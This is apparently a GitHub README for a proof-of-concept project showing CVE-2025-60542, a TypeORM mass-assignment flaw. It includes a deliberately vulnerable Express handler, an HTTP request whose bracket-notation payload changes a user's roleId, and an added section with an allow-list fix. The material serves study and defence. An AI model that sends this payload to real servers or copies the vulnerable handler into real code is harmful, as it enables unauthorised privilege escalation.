cavadalizada/typeorm-sqli
GitHub: cavadalizada/typeorm-sqli
This is a sample project demonstrating the TypeORM SQL injection vulnerability (CVE-2025-60542). It shows how extended body parsing can lead to an unauthorized data update.
Stars: 1 | Forks: 0
# typeorm-sqli (CVE-2025-60542)
Observe that the developer intends to allow only certain fields to be editable.
```
// POST /update-user/:id (route taken from the request below).
// Only username, contacts and company are meant to be caller-controlled.
app.post('/update-user/:id', async (req, res) => {
  const userId = Number(req.params.id);
  const { username, contacts, company } = req.body;
  const updateData = {
    username,
    contacts, // with extended body parsing this can arrive as a nested object, not a string
    company,
    id: userId
  };
  const userRepo = AppDataSource.getRepository(User1);
  const result = await userRepo.save(updateData);
  res.json(result);
});
```
SQL table
```
CREATE TABLE `user1` (
`id` int NOT NULL AUTO_INCREMENT,
`username` varchar(255) NOT NULL,
`contacts` varchar(255) DEFAULT NULL,
`company` varchar(255) DEFAULT NULL,
`roleId` int NOT NULL, -- not in the handler's allow-list; must never be caller-controlled
PRIMARY KEY (`id`)
)
```
Run with npm start.
```
npm i
npm start
```
Send the following payload to the endpoint.
```
POST /update-user/1 HTTP/1.1
Host: localhost:3001
Content-Length: 82
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="137", "Not/A)Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: en-US,en;q=0.9
Origin: http://localhost:3001
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:3001/users/edit-myself
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
username=newusername&contacts[company]=newcompany&contacts[roleId]=3&company=acme2
```
Observe that roleId was updated, even though it was never meant to be editable.
Note that extended body parsing is enabled. This is quite common.
```
const bodyParser = require('body-parser');
// extended: true parses bracket notation (contacts[roleId]=3) into nested objects
app.use(bodyParser.urlencoded({ extended: true })); //enable extended so we get nested json
```
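The following is an added example, not code from the typeorm-sqli repository. It re-implements, in simplified form, the bracket-notation parsing that extended urlencoded mode performs (no array indices and no depth limit, unlike the real parser), runs the README's payload through it so the nested `contacts` object the handler receives is visible, and shows two fixes: the flat parsing that `extended: false` gives you, and an allow-list builder (`buildSafeUpdate`, a hypothetical helper) that rejects non-string values before anything reaches `repo.save()`. Runs with plain Node, no dependencies.

```javascript
// Added example: how extended body parsing turns the README payload into a nested
// object, and how an allow-list keeps roleId out of the update.

// The README's request body (Content-Length 82), copied verbatim.
const PAYLOAD = 'username=newusername&contacts[company]=newcompany&contacts[roleId]=3&company=acme2';

// Simplified model of extended urlencoded parsing: "a[b][c]=v" becomes {a:{b:{c:"v"}}}.
// Keys that would touch Object.prototype are skipped (a guard any such parser needs).
function parseExtended(body) {
  const result = {};
  for (const [rawKey, value] of new URLSearchParams(body)) {
    const path = rawKey.split(/\[|\]/).filter(Boolean); // "contacts[roleId]" -> ["contacts","roleId"]
    if (path.some((p) => p === '__proto__' || p === 'constructor' || p === 'prototype')) continue;
    let node = result;
    for (let i = 0; i < path.length - 1; i++) {
      if (typeof node[path[i]] !== 'object' || node[path[i]] === null) node[path[i]] = {};
      node = node[path[i]];
    }
    node[path[path.length - 1]] = value;
  }
  return result;
}

// What extended: false hands the handler: brackets are kept literally, nothing is nested,
// so req.body.contacts is simply undefined for this payload.
function parseFlat(body) {
  return Object.fromEntries(new URLSearchParams(body));
}

// Columns a user may change about themselves. roleId is deliberately absent.
const EDITABLE_FIELDS = ['username', 'contacts', 'company'];

// Hypothetical hardened builder for the update object passed to repo.save():
// only allow-listed keys, and only scalar strings. A nested object aimed at a varchar
// column is rejected outright instead of being handed to the ORM.
function buildSafeUpdate(body, userId) {
  const update = { id: userId };
  for (const field of EDITABLE_FIELDS) {
    if (!Object.prototype.hasOwnProperty.call(body, field)) continue;
    const value = body[field];
    if (typeof value !== 'string') {
      throw new TypeError(`field "${field}" must be a string, got ${typeof value}`);
    }
    update[field] = value;
  }
  return update;
}

// Walk the README payload through both paths.
function demo() {
  const parsed = parseExtended(PAYLOAD); // what the vulnerable handler destructures from
  let rejected = null;
  try {
    buildSafeUpdate(parsed, 1); // contacts is an object here -> rejected
  } catch (e) {
    rejected = e.message;
  }
  // A benign request (constructed) passes the allow-list untouched.
  const clean = buildSafeUpdate(parseExtended('username=newusername&company=acme2'), 1);
  return { parsed, flat: parseFlat(PAYLOAD), rejected, clean };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

With `parseExtended`, `parsed.contacts` is `{ company: 'newcompany', roleId: '3' }`, which is exactly the object the vulnerable handler spreads into `updateData`. Switching to `extended: false` avoids the nesting but changes how every form on the site is parsed; the allow-list with a type check is the fix that holds regardless of the body parser, and it belongs in the handler, not in the ORM call.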